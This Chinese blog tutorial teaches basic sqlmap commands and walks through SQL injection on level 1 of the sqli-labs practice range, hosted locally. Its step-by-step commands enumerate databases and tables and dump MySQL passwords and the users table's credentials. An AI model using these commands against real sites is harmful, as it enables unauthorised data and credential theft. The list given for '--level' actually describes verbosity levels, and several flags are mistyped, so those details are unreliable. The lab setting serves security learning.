![1ebbcd3dce6a175de44728e4b39cd864.png](https://img-blog.csdnimg.cn/img_convert/1ebbcd3dce6a175de44728e4b39cd864.png)
前言:
本篇主要讲解sqlmap的基本使用,对sqli-labs靶场的第一关进行SQL注入。sqli-labs靶场搭建->Python黑客攻防(六)sqli-labs环境搭建 ,后续九关的解题方法都和这个差不多,可以自己网上查资料学习,如果有时间也会更新对后续关卡的通关步骤,在进行SQL注入前,我们先对sqlmap基础命令进行简单了解。
![474eb3b60b695af2f804d047ae94ab60.gif](https://img-blog.csdnimg.cn/img_convert/474eb3b60b695af2f804d047ae94ab60.gif)
sqlmap基础命令:
sqlmap支持多种选项,-u 选项表示后面出现的是URL, –level 选项表示要执行的测试级别,–risk选项用于设置待执行测试的风险。风险表示攻击所用SQL代码的危险程度,风险等级越高,表示相关网站出现问题的可能性越高。
– -level选项
0:仅输出Python反向追踪( Trackback )信息、错误及重要信息( Critical Message)。
1:显示信息与警告信息。该值为默认值。
2:同时显示所有调试信息。
3:同时显示插入的有效载荷信息。
4:同时显示HTTP请求信息。
5:同时显示HTTP响应头信息。
6:同时显示HTTP响应页面内容信息。
–risk选项
1:注入无问题代码,执行测试。默认值。Normal Injection (使用union)、Blind Injection (使用ture:1=1, flase:1=2 )2:执行Time- -based Injection using heavy query。进行Blind Injection时,若不论真假都有相同结果值,则经过指定的待机时间后,通过测定时间判断插入的查询是否得以执行。
3:使用OR- based Injection。若被攻击的目标程序执行update语句,则插入的or语句就会导致致命问题。
–dbms选项
指定要使用的数据库类型。若不指定,则对sqlmap支持的所有类型的数据库探测漏洞。
1.清除sqlmap缓存:
python sqlmap.py --purge
2.检测注入点是否可用
python sqlmap.py -u "目标URL"
3.暴库
python sqlmap.py -u "目标URL" -dbs
4.暴当前使用的数据库
python sqlmap.py -u "目标URL" –current-db
5.暴当前使用的账户
python sqlmap.py -u "目标URL" –current-user
6.列出所有使用过的账户
python sqlmap.py -u "目标URL" –users
7.mysql的登录账户和密码
python sqlmap.py -u "目标URL" –passwords
8.列出数据库中的表
python sqlmap.py -u "目标URL" -D "指定数据库名" –tables
9.列出表中字段
python sqlmap.py -u "目标URL" -D "指定数据库名" -T "指定的表名" –columns
10.爆字段内容
python sqlmap.py -u "目标URL" -D "指定数据库名" -T "指定的表名" -C "字段名" -dump
![dc9e9a048292ddfb657e422a2a94c7c7.gif](https://img-blog.csdnimg.cn/img_convert/dc9e9a048292ddfb657e422a2a94c7c7.gif)
步骤:
1.先开启靶场,第一次使用靶场要对数据库进行设置。点击如下图的Setup/reset DataBase forlabs。然后返回这个界面,下拉点击Less-1进入第一关。
![1bd7b56408043658dcdec5bd905b14c4.png](https://img-blog.csdnimg.cn/img_convert/1bd7b56408043658dcdec5bd905b14c4.png)
![1c7494225d0d0763b7130b3b06db98c4.png](https://img-blog.csdnimg.cn/img_convert/1c7494225d0d0763b7130b3b06db98c4.png)
2.在地址栏输入如下图“/?id=1”登录数据库。
![c99b03c4922a08fe8d4d2e663e11ace9.png](https://img-blog.csdnimg.cn/img_convert/c99b03c4922a08fe8d4d2e663e11ace9.png)
3.打开sqlmap,输入如下命令对数据库进行暴库。(输入命令的过程中请注意靶场路径,不可使用中文字符)
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --leve=5 --risk=3 --dbs
![de525bbd8ee61f1e0846c38805f9bc66.png](https://img-blog.csdnimg.cn/img_convert/de525bbd8ee61f1e0846c38805f9bc66.png)
![c42c5b4f6526cc7e43340a877e795eee.png](https://img-blog.csdnimg.cn/img_convert/c42c5b4f6526cc7e43340a877e795eee.png)
4.如上图可知数据库为MySQL,是否要跳过特定于其他dbms的测试有效负载?输入n。再如下图提示是否测试其他,输入n.找到数据库类型和确定有注入点可利用全部数据库也爆出来了。
![12cfce29f4d75619f363dba4114be5ed.png](https://img-blog.csdnimg.cn/img_convert/12cfce29f4d75619f363dba4114be5ed.png)
![37095a7d0cc807c7fcc63b08e068f405.png](https://img-blog.csdnimg.cn/img_convert/37095a7d0cc807c7fcc63b08e068f405.png)
5.运行下面命令查看我们所在的数据库。运行下面的命令后可以看到我们所属的数据库为“security”。
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --leve=5 --risk=3 --dbms=mysql --current-db
![86d8cf7e896a6a63eed0a918aed912c2.png](https://img-blog.csdnimg.cn/img_convert/86d8cf7e896a6a63eed0a918aed912c2.png)
6.运行命令查看数据库中的表。
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --leve=5 --risk=3 --dbms=mysql -D "security" --tables
![87a1ca03e3fe58c99f757e06ef82ec32.png](https://img-blog.csdnimg.cn/img_convert/87a1ca03e3fe58c99f757e06ef82ec32.png)
7.猜测users表中应该有我们想要的数据,运行下方命令获取user表中的字段。
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --leve=5 --risk=3 --dbms=mysql -D "security" -T "users" --columns
![9a55feb47e9d01803f982568b1ae237c.png](https://img-blog.csdnimg.cn/img_convert/9a55feb47e9d01803f982568b1ae237c.png)
8.显示我们想要的“password,username”字段。输入如下命令成功获取我们要的数据。SQL注入演示完毕。
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --leve=5 --risk=3 --dbms=mysql -D "security" -T "users" -C "password,username" --dump
![c6e87fb347f6d6c3b436f14112d74a7f.png](https://img-blog.csdnimg.cn/img_convert/c6e87fb347f6d6c3b436f14112d74a7f.png)
觉得不错,记得3连。关注不迷路。
![37e36a315b9cb985859b8ebf005e59f9.png](https://img-blog.csdnimg.cn/img_convert/37e36a315b9cb985859b8ebf005e59f9.png)